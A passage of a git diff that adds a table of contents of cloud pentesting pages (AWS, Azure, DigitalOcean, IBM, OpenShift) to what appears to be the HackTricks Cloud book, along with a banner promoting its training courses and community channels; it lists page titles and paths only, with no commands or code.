Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md) + - [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md) + - [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) + - [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md) + - [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md) + - [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md) + - [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md) + - [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md) + - [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md) + - [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md) + - [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md) + - [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) + - [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md) + - [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md) + - [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) + - [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) + - [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) + - [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) + - [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) + - [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) + - [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md) + - [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md) + - [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md) + - [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md) + - [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) + - [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md) + - [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md) + - [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md) + - [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md) + - [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md) + - [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md) + - [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md) + - [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md) + - [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md) + - [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) + - [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md) + - [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md) + - [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md) + - [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md) + - [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md) + - [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md) + - [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) + - [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md) + - [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md) + - [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md) + - [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md) + - [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md) + - [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md) + - [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) + - [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md) + - [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md) + - [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) + - [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md) + - [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md) + - [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md) + - [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md) + - [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md) + - [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md) + - [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md) + - [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md) + - [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md) + - [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md) + - [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md) + - [AWS - CloudWatch Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md) + - [AWS - Config Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md) + - [AWS - Control Tower Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-control-tower-enum.md) + - [AWS - Cost Explorer Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cost-explorer-enum.md) + - [AWS - Detective Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-detective-enum.md) + - [AWS - Firewall Manager Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-firewall-manager-enum.md) + - [AWS - GuardDuty Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) + - [AWS - Inspector Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md) + - [AWS - Macie Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.md) + - [AWS - Security Hub Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.md) + - [AWS - Shield Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.md) + - [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md) + - [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md) + - [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md) + - [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md) + - [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md) + - [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md) + - [AWS - CloudFront Enum](pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md) + - [AWS - Codebuild Enum](pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md) + - [AWS - Cognito Enum](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md) + - [Cognito Identity Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md) + - [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md) + - [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) + - [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md) + - [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md) + - [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md) + - [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md) + - [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md) + - [AWS - VPC & Networking Basic Information](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md) + - [AWS - ECR Enum](pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md) + - [AWS - ECS Enum](pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md) + - [AWS - EKS Enum](pentesting-cloud/aws-security/aws-services/aws-eks-enum.md) + - [AWS - Elastic Beanstalk Enum](pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md) + - [AWS - ElastiCache](pentesting-cloud/aws-security/aws-services/aws-elasticache.md) + - [AWS - EMR Enum](pentesting-cloud/aws-security/aws-services/aws-emr-enum.md) + - [AWS - EFS Enum](pentesting-cloud/aws-security/aws-services/aws-efs-enum.md) + - [AWS - EventBridge Scheduler Enum](pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md) + - [AWS - Kinesis Data Firehose Enum](pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md) + - [AWS - IAM, Identity Center & SSO Enum](pentesting-cloud/aws-security/aws-services/aws-iam-enum.md) + - [AWS - KMS Enum](pentesting-cloud/aws-security/aws-services/aws-kms-enum.md) + - [AWS - Lambda Enum](pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md) + - [AWS - Lightsail Enum](pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md) + - [AWS - MQ Enum](pentesting-cloud/aws-security/aws-services/aws-mq-enum.md) + - [AWS - MSK Enum](pentesting-cloud/aws-security/aws-services/aws-msk-enum.md) + - [AWS - Organizations Enum](pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md) + - [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md) + - [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md) + - [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md) + - [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md) + - [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md) + - [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md) + - [AWS - SQS Enum](pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md) + - [AWS - S3, Athena & Glacier Enum](pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md) + - [AWS - Step Functions Enum](pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md) + - [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md) + - [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md) + - [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md) + - [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md) + - [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md) + - [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md) + - [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md) + - [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md) + - [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md) + - [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) + - [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) + - [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) + - [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) + - [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) + - [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md) + - [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) + - [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) + - [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md) + - [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md) + - [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) + - [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md) + - [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md) + - [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) + - [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) + - [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md) + - [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) + - [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) + - [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) +- [Azure Pentesting](pentesting-cloud/azure-security/README.md) + - [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md) + - [Az - Tokens & Public Applications](pentesting-cloud/azure-security/az-basic-information/az-tokens-and-public-applications.md) + - [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) + - [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) + - [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) + - [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) + - [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) + - [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) + - [Az - Services](pentesting-cloud/azure-security/az-services/README.md) + - [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md) + - [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md) + - [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md) + - [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md) + - [Az - Automation Account](pentesting-cloud/azure-security/az-services/az-automation-account/README.md) + - [Az - State Configuration RCE](pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md) + - [Az - Azure App Service & Function Apps](pentesting-cloud/azure-security/az-services/az-app-service.md) + - [Az - Intune](pentesting-cloud/azure-security/az-services/intune.md) + - [Az - File Shares](pentesting-cloud/azure-security/az-services/az-file-shares.md) + - [Az - Function Apps](pentesting-cloud/azure-security/az-services/az-function-apps.md) + - [Az - Key Vault](pentesting-cloud/azure-security/az-services/keyvault.md) + - [Az - Logic Apps](pentesting-cloud/azure-security/az-services/az-logic-apps.md) + - [Az - Management Groups, Subscriptions & Resource Groups](pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.md) + - [Az - Queue Storage](pentesting-cloud/azure-security/az-services/az-queue-enum.md) + - [Az - Service Bus](pentesting-cloud/azure-security/az-services/az-servicebus-enum.md) + - [Az - SQL](pentesting-cloud/azure-security/az-services/az-sql.md) + - [Az - Storage Accounts & Blobs](pentesting-cloud/azure-security/az-services/az-storage.md) + - [Az - Table Storage](pentesting-cloud/azure-security/az-services/az-table-storage.md) + - [Az - Virtual Machines & Network](pentesting-cloud/azure-security/az-services/vms/README.md) + - [Az - Azure Network](pentesting-cloud/azure-security/az-services/vms/az-azure-network.md) + - [Az - Permissions for a Pentest](pentesting-cloud/azure-security/az-permissions-for-a-pentest.md) + - [Az - Lateral Movement (Cloud - On-Prem)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/README.md) + - [Az AD Connect - Hybrid Identity](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md) + - [Az- Synchronising New Users](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md) + - [Az - Default Applications](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md) + - [Az - Cloud Kerberos Trust](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md) + - [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md) + - [Az - PHS - Password Hash Sync](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md) + - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md) + - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md) + - [Az - Arc vulnerable GPO Deploy Script](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md) + - [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md) + - [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md) + - [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md) + - [Az - Pass the PRT](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md) + - [Az - Phishing Primary Refresh Token (Microsoft Entra)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md) + - [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) + - [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) + - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) + - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) + - [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md) + - [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) + - [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) + - [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) + - [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) + - [Az - SQL Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md) + - [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) + - [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) + - [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) + - [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md) + - [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) + - [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md) + - [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md) + - [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md) + - [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) + - [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) + - [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) + - [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) + - [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) + - [Az - SQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md) + - [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) + - [Az - Queue Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md) + - [Az - VMs Persistence](pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md) + - [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) + - [Az - Device Registration](pentesting-cloud/azure-security/az-device-registration.md) +- [Digital Ocean Pentesting](pentesting-cloud/digital-ocean-pentesting/README.md) + - [DO - Basic Information](pentesting-cloud/digital-ocean-pentesting/do-basic-information.md) + - [DO - Permissions for a Pentest](pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md) + - [DO - Services](pentesting-cloud/digital-ocean-pentesting/do-services/README.md) + - [DO - Apps](pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md) + - [DO - Container Registry](pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md) + - [DO - Databases](pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md) + - [DO - Droplets](pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md) + - [DO - Functions](pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md) + - [DO - Images](pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md) + - [DO - Kubernetes (DOKS)](pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md) + - [DO - Networking](pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md) + - [DO - Projects](pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md) + - [DO - Spaces](pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md) + - [DO - Volumes](pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md) +- [IBM Cloud Pentesting](pentesting-cloud/ibm-cloud-pentesting/README.md) + - [IBM - Hyper Protect Crypto Services](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-crypto-services.md) + - [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md) + - [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md) +- [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md) + - [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md) + - [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md) + - [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md) + - [OpenShift - Jenkins Build Pod Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md) + - [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md) + - [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md) + - [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md) + - [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md) + +# 🛫 Pentesting Network Services + +- [HackTricks Pentesting Network$$external:https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network$$]() +- [HackTricks Pentesting Services$$external:https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh$$]() diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md new file mode 100644 index 000000000..b03deaf4a --- /dev/null +++ b/src/banners/hacktricks-training.md @@ -0,0 +1,13 @@ +> [!TIP] +> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +> +>
+> +> Support HackTricks +> +> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +> +>
